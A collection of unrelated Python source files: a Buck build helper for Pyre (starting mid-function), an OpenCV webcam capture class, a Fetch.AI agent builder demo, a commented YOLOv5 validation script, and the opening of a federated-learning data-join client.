"".join([line.decode() for line in buck_builder_process.stdout])
)
self.conflicting_files += debug_output["conflictingFiles"]
self.unsupported_files += debug_output["unsupportedFiles"]
return [self._output_directory]
else:
raise BuckException(
"Could not build targets. Check the paths or run `buck clean`."
)
def _read_stderr(self, stream: Iterable[bytes]) -> None:
for line in stream:
line = line.decode().rstrip()
if line.startswith("INFO: "):
LOG.info(line[6:])
elif line.startswith("WARNING: "):
LOG.warning(line[9:])
elif line.startswith("ERROR: "):
LOG.error(line[7:])
elif line.startswith("[WARNING:"):
# Filter away thrift warnings.
pass
else:
LOG.error(line)
class SimpleBuckBuilder(BuckBuilder):
def __init__(self, build: bool = True) -> None:
self._build = build
def build(self, targets: Iterable[str]) -> Iterable[str]:
"""
Shell out to buck to build the targets, then yield the paths to the
link trees.
"""
return generate_source_directories(targets, build=self._build)
def presumed_target_root(target):
root_index = target.find("//")
if root_index != -1:
target = target[root_index + 2 :]
target = target.replace("/...", "")
target = target.split(":")[0]
return target
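# Illustrative results (target strings are hypothetical):
#   presumed_target_root("//tools/pyre:pyre")  -> "tools/pyre"
#   presumed_target_root("//tools/pyre/...")   -> "tools/pyre"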
# Expects the targets to be already normalized.
def _find_built_source_directories(
targets_to_destinations: Iterable[Tuple[str, str]]
) -> BuckOut:
targets_not_found = []
source_directories = []
buck_root = find_buck_root(os.getcwd())
if buck_root is None:
raise Exception("No .buckconfig found in ancestors of the current directory.")
directories = set()
for target, destination in targets_to_destinations:
directories.add((target, os.path.dirname(destination)))
for target, directory in directories:
target_name = target.split(":")[1]
discovered_source_directories = glob.glob(
os.path.join(buck_root, directory, "{}#*link-tree".format(target_name))
)
if len(discovered_source_directories) == 0:
targets_not_found.append(target)
source_directories.extend(
[
tree
for tree in discovered_source_directories
if not tree.endswith(
(
"-vs_debugger#link-tree",
"-interp#link-tree",
"-ipython#link-tree",
)
)
]
)
return BuckOut(set(source_directories), set(targets_not_found))
def _normalize(targets: List[str]) -> List[Tuple[str, str]]:
LOG.info(
"Normalizing target%s `%s`",
"s:" if len(targets) > 1 else "",
"`, `".join(targets),
)
try:
command = (
["buck", "targets", "--show-output"]
+ targets
+ ["--type", "python_binary", "python_test"]
)
targets_to_destinations = (
subprocess.check_output(command, stderr=subprocess.PIPE, timeout=600)
.decode()
.strip()
.split("\n")
) # type: List[str]
targets_to_destinations = list(filter(bool, targets_to_destinations))
# The output is of the form //target //corresponding.par
result = []
for target in targets_to_destinations:
pair = target.split(" ")
if len(pair) != 2:
pass
else:
result.append((pair[0], pair[1]))
if not result:
LOG.warning(
"Provided targets do not contain any binary or unittest targets."
)
return []
else:
LOG.info(
"Found %d buck target%s.", len(result), "s" if len(result) > 1 else ""
)
return result
except subprocess.TimeoutExpired as error:
LOG.error("Buck output so far: %s", error.stderr.decode().strip())
raise BuckException(
"Seems like `{}` is hanging.\n "
"Try running `buck clean` before trying again.".format(
# pyre-fixme: command not always defined
" ".join(command[:-1])
)
)
except subprocess.CalledProcessError as error:
LOG.error("Buck returned error: %s" % error.stderr.decode().strip())
raise BuckException(
"Could not normalize targets. Check the paths or run `buck clean`."
)
def _build_targets(targets: List[str], original_targets: List[str]) -> None:
LOG.info(
"Building target%s `%s`",
"s:" if len(original_targets) > 1 else "",
"`, `".join(original_targets),
)
command = ["buck", "build"] + targets
try:
subprocess.check_output(command, stderr=subprocess.PIPE)
LOG.warning("Finished building targets.")
except subprocess.CalledProcessError as error:
# The output can be overwhelming, hence print only the last 20 lines.
lines = error.stderr.decode().splitlines()
LOG.error("Buck returned error: %s" % "\n".join(lines[-20:]))
raise BuckException(
"Could not build targets. Check the paths or run `buck clean`."
)
def _map_normalized_targets_to_original(
unbuilt_targets: Iterable[str], original_targets: Iterable[str]
) -> List[str]:
mapped_targets = set()
for target in unbuilt_targets:
# Each original target is either a `/...` glob or a proper target.
# If it's a glob, we're looking for the glob to be a prefix of the unbuilt
# target. Otherwise, we care about exact matches.
name = None
for original in original_targets:
if original.endswith("/..."):
if target.startswith(original[:-4]):
name = original
else:
if target == original:
name = original
# No original target matched, fallback to normalized.
if name is None:
name = target
mapped_targets.add(name)
return list(mapped_targets)
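# Illustrative example (targets are hypothetical): an unbuilt target that falls under
# an original `/...` glob is reported under that glob:
#   _map_normalized_targets_to_original(["//project/lib:test"], ["//project/..."])
#   -> ["//project/..."]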
@functools.lru_cache()
def find_buck_root(path: str) -> Optional[str]:
return find_root(path, ".buckconfig")
def resolve_relative_paths(paths: List[str]) -> Dict[str, str]:
"""
Query buck to obtain a mapping from each absolute path to the relative
location in the analysis directory.
"""
buck_root = find_buck_root(os.getcwd())
if buck_root is None:
LOG.error(
"Buck root couldn't be found. Returning empty analysis directory mapping."
)
return {}
command = [
"buck",
"query",
"--json",
"--output-attribute",
".*",
"owner(%s)",
*paths,
]
try:
output = json.loads(
subprocess.check_output(command, timeout=30, stderr=subprocess.DEVNULL)
.decode()
.strip()
)
except (
subprocess.TimeoutExpired,
subprocess.CalledProcessError,
JSONDecodeError,
) as error:
raise BuckException("Querying buck for relative paths failed: {}".format(error))
# TODO(T40580762) we should use the owner name to determine which files are a
# part of the pyre project
results = {}
for path in paths:
# For each path, search for the target that owns it.
for owner in output.values():
prefix = os.path.join(buck_root, owner["buck.base_path"]) + os.sep
if not path.startswith(prefix):
continue
suffix = path[len(prefix) :]
if suffix not in owner["srcs"]:
continue
if "buck.base_module" in owner:
base_path = os.path.join(*owner["buck.base_module"].split("."))
else:
base_path = owner["buck.base_path"]
results[path] = os.path.join(base_path, owner["srcs"][suffix])
break # move on to next path
return results
def generate_source_directories(
original_targets: Iterable[str], build: bool
) -> Set[str]:
original_targets = list(original_targets)
targets_to_destinations = _normalize(original_targets)
targets = [pair[0] for pair in targets_to_destinations]
if build:
_build_targets(targets, original_targets)
buck_out = _find_built_source_directories(targets_to_destinations)
source_directories = buck_out.source_directories
if buck_out.targets_not_found:
if not build:
# Build all targets to ensure buck doesn't remove some link trees as we go.
_build_targets(targets, original_targets)
buck_out = _find_built_source_directories(targets_to_destinations)
source_directories = buck_out.source_directories
if buck_out.targets_not_found:
message_targets = _map_normalized_targets_to_original(
buck_out.targets_not_found, original_targets
)
raise BuckException(
"Could not find link trees for:\n `{}`.\n "
"See `{} --help` for more information.".format(
" \n".join(message_targets), sys.argv[0]
)
)
return source_directories
|
webcam.py
|
"""Raspberry Pi Face Recognition Treasure Box
Webcam OpenCV Camera Capture Device
Copyright 2013 Tony DiCola
Webcam device capture class using OpenCV. This class allows you to capture a
single image from the webcam, as if it were a snapshot camera.
This isn't used by the treasure box code out of the box, but is useful to have
if running the code on a PC where only a webcam is available. The interface is
the same as the picam.py capture class so it can be used in the box.py code
without any changes.
"""
import threading
import time
import cv2
# Rate at which the webcam will be polled for new images.
CAPTURE_HZ = 30.0
class OpenCVCapture(object):
def __init__(self, device_id=0):
"""Create an OpenCV capture object associated with the provided webcam
device ID.
"""
# Open the camera.
self._camera = cv2.VideoCapture(device_id)
# self._camera.set(3,160)
#self._camera.set(4,120)
if not self._camera.isOpened():
self._camera.open()
# Start a thread to continuously capture frames.
# This must be done because different layers of buffering in the webcam
# and OS drivers will cause you to retrieve old frames if they aren't
# continuously read.
self._capture_frame = None
# Use a lock to prevent concurrent access to the camera.
self._capture_lock = threading.Lock()
self._capture_thread = threading.Thread(target=self._grab_frames)
self._capture_thread.daemon = True
self._capture_thread.start()
def _grab_frames(self):
while True:
retval, frame = self._camera.read()
with self._capture_lock:
self._capture_frame = None
if retval:
self._capture_frame = frame
time.sleep(1.0 / CAPTURE_HZ)
def read(self):
"""Read a single frame from the camera and return the data as an OpenCV
image (which is a numpy array).
"""
frame = None
with self._capture_lock:
frame = self._capture_frame
# If there are problems, keep retrying until an image can be read.
while frame is None:
time.sleep(0)
with self._capture_lock:
frame = self._capture_frame
# Return the captured image data.
return frame
def stop(self):
print('{"status":"Terminating..."}')
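# Illustrative usage (a minimal sketch; device id 0 and the output path are assumptions):
#   capture = OpenCVCapture(device_id=0)
#   frame = capture.read()   # blocks until the background thread has grabbed a frame
#   cv2.imwrite('snapshot.jpg', frame)
#   capture.stop()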
|
programmatic_aea.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This scripts contains code from agent-vs-aea.md file."""
import os
import time
from threading import Thread
from aea.aea_builder import AEABuilder
from aea.configurations.base import SkillConfig
from aea.connections.stub.connection import write_with_lock
from aea.crypto.cosmos import CosmosCrypto
from aea.crypto.helpers import COSMOS_PRIVATE_KEY_FILE, create_private_key
from aea.skills.base import Skill
ROOT_DIR = "./"
INPUT_FILE = "input_file"
OUTPUT_FILE = "output_file"
def run():
# Create a private key
create_private_key(CosmosCrypto.identifier, COSMOS_PRIVATE_KEY_FILE)
# Ensure the input and output files do not exist initially
if os.path.isfile(INPUT_FILE):
os.remove(INPUT_FILE)
if os.path.isfile(OUTPUT_FILE):
os.remove(OUTPUT_FILE)
# Instantiate the builder and build the AEA
# By default, the default protocol, error skill and stub connection are added
builder = AEABuilder()
builder.set_name("my_aea")
builder.add_private_key(CosmosCrypto.identifier, COSMOS_PRIVATE_KEY_FILE)
# Add the echo skill (assuming it is present in the local directory 'packages')
builder.add_skill("./packages/fetchai/skills/echo")
# create skill and handler manually
from aea.protocols.base import Message
from aea.protocols.default.message import DefaultMessage
from aea.skills.base import Handler
class DummyHandler(Handler):
"""Dummy handler to handle messages."""
SUPPORTED_PROTOCOL = DefaultMessage.protocol_id
def setup(self) -> None:
"""Noop setup."""
def teardown(self) -> None:
"""Noop teardown."""
def handle(self, message: Message) -> None:
"""Handle incoming message."""
self.context.logger.info("You got a message: {}".format(str(message)))
config = SkillConfig(name="test_skill", author="fetchai")
skill = Skill(configuration=config)
dummy_handler = DummyHandler(
name="dummy_handler", skill_context=skill.skill_context
)
skill.handlers.update({dummy_handler.name: dummy_handler})
builder.add_component_instance(skill)
# Create our AEA
my_aea = builder.build()
# Set the AEA running in a different thread
try:
t = Thread(target=my_aea.start)
t.start()
# Wait for everything to start up
time.sleep(4)
# Create a message inside an envelope and get the stub connection to pass it on to the echo skill
message_text = b"my_aea,other_agent,fetchai/default:0.4.0,\x08\x01\x12\x011*\x07\n\x05hello,"
with open(INPUT_FILE, "wb") as f:
write_with_lock(f, message_text)
print(b"input message: " + message_text)
# Wait for the envelope to get processed
time.sleep(4)
# Read the output envelope generated by the echo skill
with open(OUTPUT_FILE, "rb") as f:
print(b"output message: " + f.readline())
finally:
# Shut down the AEA
my_aea.stop()
t.join()
t = None
if __name__ == "__main__":
run()
|
val.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
from yolov5_master.models.experimental import attempt_load
from yolov5_master.utils.datasets import create_dataloader
from yolov5_master.utils.general import coco80_to_coco91_class, check_dataset, check_img_size, check_requirements, \
check_suffix, check_yaml, box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, \
increment_path, colorstr
from yolov5_master.utils.metrics import ap_per_class, ConfusionMatrix
from yolov5_master.utils.plots import plot_images, output_to_target, plot_study_txt
from yolov5_master.utils.torch_utils import select_device, time_sync
from yolov5_master.utils.callbacks import Callbacks
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project='runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
"""
:param model: the model to evaluate; passed in when val is called from train.py
:param dataloader: dataloader for the validation set; passed in when called from train.py
:param save_dir: directory where images of the first validation batches are saved with label and prediction boxes drawn
:param plots: whether to draw visualizations such as prediction plots, the confusion matrix and PR curves
:param wandb_logger: wandb visualization tool, passed in by train.py
:param compute_loss: loss-computation object, passed in by train.py
"""
# Initialize/load model and set device
# Determine whether val is being called during training; if so, reuse the training device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
# Select the device
device = select_device(device, batch_size=batch_size)
# Directories
# Build the directory where results are saved
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load the model
check_suffix(weights, '.pt')
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
# Check that the input image size is divisible by the grid size gs (32)
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
# Load the dataset configuration
data = check_dataset(data) # check
# Half
# If the device is not CPU and half=True, convert the model from Float32 to Float16 to speed up inference
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
# Determine whether this is the COCO dataset
is_coco = isinstance(data.get('val'), str) and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
# Set the IoU thresholds from 0.5 to 0.95 in steps of 0.05
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
# Number of IoU thresholds
niou = iouv.numel()
# Dataloader
if not training:
# Run a forward pass on an all-zeros tensor to check that inference works
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, single_cls, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
# Note that rect=True here: YOLOv5 evaluation uses rectangular inference with a 0.5 pad
seen = 0
# Initialize the count of evaluated images
confusion_matrix = ConfusionMatrix(nc=nc)
# Get the class names
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
"""
Get the class index mapping for the COCO dataset.
Note that COCO has 80 classes (indices 0~79),
but its annotation indices actually fall in the range 0~90.
coco80_to_coco91_class() maps between the two, returning an index array in the 0~90 range.
"""
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
# Set the header line shown by the tqdm progress bar
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
# Initialize metrics and timers
dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
# Initialize the validation loss
loss = torch.zeros(3, device=device)
# Initialize the JSON dict, statistics, AP values and per-class AP list
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
"""
time_sync() calls torch.cuda.synchronize() before returning time.time().
torch.cuda.synchronize() waits until all work on the GPU has finished,
which makes the measured times more accurate.
"""
t1 = time_sync()
img = img.to(device, non_blocking=True)
# Convert images from Float32 to Float16 as well
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t2 = time_sync()
# Time spent on data copy, type conversion and division by 255
dt[0] += t2 - t1
# Run model
# Forward pass: out holds the inference predictions, train_out the raw training outputs
out, train_out = model(img, augment=augment) # inference and training outputs
# Accumulate inference time
dt[1] += time_sync() - t2
# Compute loss
# If val is running during training, compute the validation box, obj and cls losses from the training outputs
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# Run NMS
# Scale normalized label boxes back to pixel coordinates; if save-hybrid is set they are passed to NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t3 = time_sync()
# Apply non-max suppression
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
dt[2] += time_sync() - t3
# Statistics per image
# Per-image statistics: write predictions to txt, build the JSON dict, count TPs, etc.
for si, pred in enumerate(out):
# Get the labels of the si-th image: class, x, y, w, h
# targets[:, 0] is the index of the image each label belongs to
labels = targets[targets[:, 0] == si, 1:]
# Get the label classes
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
# Count evaluated images
seen += 1
# If there are no predictions, append empty entries to stats
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
# Rescale coordinates from input size back to the original image size
scale_coords(img[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(img[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.run('on_val_image_end', pred, predn, path, names, img[si])
# Plot images
# Draw and save ground-truth and prediction boxes for the first three batches
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
# Concatenate the per-image entries of the stats list
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
# Compute metrics from the TP information gathered above:
# precision TP/(TP+FP), recall TP/P, mAP, F1 score, per class
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
# nt is an array with the number of label boxes per class in the validation set
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
# Print the aggregated metrics
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
# Show the metrics for each individual class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
# Print pre-processing, inference and NMS times
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
# Plot the confusion matrix
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Save JSON
# Evaluate with pycocotools using the previously saved JSON predictions
# Note that the validation labels must also be converted to COCO JSON format
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
# Path to the annotations JSON file
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
# Path where the prediction JSON file is saved
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
# Load the annotation and prediction JSON files
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
# Create the evaluator
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
# Run the evaluation
eval.evaluate()
eval.accumulate()
# Summarize the results
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
# Return the evaluation metrics
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
"""
Description of the opt arguments:
data: dataset configuration file (dataset paths, class names, etc.)
weights: model weights to evaluate
batch-size: forward-pass batch size, default 32
imgsz: input image size, default 640
conf-thres: confidence threshold for filtering boxes, default 0.001
iou-thres: IoU threshold used during NMS, default 0.6
task: evaluation mode, default 'val'; see the code below for details
device: device to run on; cpu, 0 (a single GPU, cuda:0) or 0,1,2,3 (multiple GPUs)
single-cls: whether the dataset contains only one class, default False
verbose: whether to print mAP for every class, default False
save-txt: whether to save predicted box coordinates to txt files, default False
save-hybrid: whether to save labels together with predictions in the txt files, default False
save-conf: whether to also save confidences in the --save-txt labels, default False
save-json: whether to save predictions in COCO JSON format and evaluate with the cocoapi (requires COCO-style JSON labels), default False
project: folder in which evaluation logs are saved
name: name of the log folder, so results end up in project/name
exist_ok: whether an existing project/name folder is acceptable; when False a new incremented folder is created
half: whether to use FP16 half-precision inference
"""
parser = argparse.ArgumentParser(prog='val.py')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default='runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
opt = parser.parse_args()
# Set the save_json flag automatically for COCO data
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
# check_yaml verifies that the file exists
opt.data = check_yaml(opt.data) # check YAML
return opt
def main(opt):
# Initialize logging
set_logging()
print(colorstr('val: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_requirements(requirements=FILE.parent / 'support/requirements.txt', exclude=('tensorboard', 'thop'))
# Check the environment
if opt.task in ('train', 'val', 'test'): # run normally
run(**vars(opt))
# Benchmark model speed
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
save_json=False, plots=False)
# When task == 'study', evaluate the model over a range of image sizes and plot the results
elif opt.task == 'study': # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
client_no_tf.py
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import shutil
import time
import queue
import random
import threading
from functools import cmp_to_key
import mmh3
from xfl.common.common import RunMode
from xfl.common.logger import log
from xfl.data import utils
from xfl.data.check_sum import CheckSum
from xfl.data.store.sample_kv_store import DictSampleKvStore
from xfl.data.store.etcd_kv_store import EtcdSampleKvStore
from xfl.data.utils import get_sample_store_key, split_sample_store_key
from xfl.service.data_join_client import create_data_join_client
from xfl.data.tfreecord.tfreecord import RecordReader, RecordWriter
class DefaultKeySelector:
def __init__(self, bucket_num: int = 64):
self._bucket_num = bucket_num
def get_key(self, value):
return mmh3.hash(value[0]) % self._bucket_num
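# Illustrative example (the record tuple below is a placeholder): the selector hashes
# the first element of the record (the hash-column bytes) with mmh3 and maps it into
# one of `bucket_num` buckets:
#   DefaultKeySelector(bucket_num=64).get_key((b'user_123', b'20210101', b'raw_record'))
#   -> an int in range(64)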
SAMPLE_STORE_TYPE = {
"memory": DictSampleKvStore,
"etcd": EtcdSampleKvStore
}
def record_cmp(left, right):
a = split_sample_store_key(left)
b = split_sample_store_key(right)
if a[1] < b[1]:
return -1
if a[1] > b[1]:
return 1
if a[0] < b[0]:
return -1
if a[0] > b[0]:
return 1
return 0
